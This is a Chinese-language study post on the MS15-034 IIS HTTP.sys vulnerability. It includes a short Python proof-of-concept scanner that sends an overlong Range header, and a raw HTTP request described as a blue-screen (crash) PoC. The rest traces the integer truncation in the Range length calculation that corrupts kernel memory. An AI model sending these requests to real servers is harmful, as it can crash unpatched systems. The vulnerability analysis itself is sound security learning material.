微软 IIS HTTP.sys漏洞原理学习以及POC

零、MS15-034POC核心部分(参考巡风)：

1 socket.setdefaulttimeout(timeout)2 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)3 s.connect((ip, int(port)))4 flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"5 s.send(flag)6 data = s.recv(1024)7 s.close()8 if ‘Requested Range Not Satisfiable‘ in data and ‘Server: Microsoft‘ in data:9 ????print "vuln"

一、MS15-034 HTTP.sys漏洞原理考证：

原理部分参考：http://www.ijiandao.com/safe/cto/12821.html

1 #举例：蓝屏POC2 """3 GET /welcome.png HTTP/1.14 Host: PoC5 Range: bytes=12345-184467440737095516156 """

这个地方的Range字段在IIS内部HTTP!UlBuildFastRangeCacheMdlChain（用于生成响应报文的缓存MDL链，来描述HTTP响应的状态行、头部与消息体。）这个函数中会调用一次nt! IoBuildPartialMdl函数来生成MDL链。这这个函数里，会计算length这个值：

 注意这里明确要求了由VirtualAddress与Length确定的区间必须是SourceMdl描述的缓冲区的一个自区间，正是对此要求的违反导致了此漏洞中的内存破坏。

第3次调用nt! IoBuildPartialMdl来生成消息体MDL时的参数如下：

SourceMdl = 0xfffffa801a38cb60
SourceMdl.VirtualAddress = 0xfffffa801ac94000
SourceMdl.ByteCount = 0x2d315
SourceMdl.ByteOffset = 0x0
TargetMdl = 0xfffffa801a2ed580
TargetMdl.VirtualAddress = 0xfffffa801ac97000
TargetMdl.ByteCount = 0xffffcfc7
TargetMdl.ByteOffset = 0x39
VirtualAddress = 0xfffffa801ac97039
Length = 0xffffcfc7

这里的Length是根据HTTP请求消息头部中的Range字段计算得到的，过程如下：

首先，在HTTP!UlpParseRange中对Range字段进行解析，得到RangeBegin、RangeEnd；
然后，计算RangeLength = RangeEnd – RangeBegin + 1；
最后，将RangeLength截断为32位得到Length。
以PoC中的Range: bytes=12345-18446744073709551615为例：
RangeBegin = 12345 = 0x3039
RangeEnd = 18446744073709551615 = 0xffffffffffffffff
RangeLength = 0xffffffffffffffff – 0x00003039 + 1 = 0xffffffffffffcfc7
Length = 0xffffcfc7
显然由于Length超长而导致违反了nt! IoBuildPartialMdl的要求，进而造成内存破坏。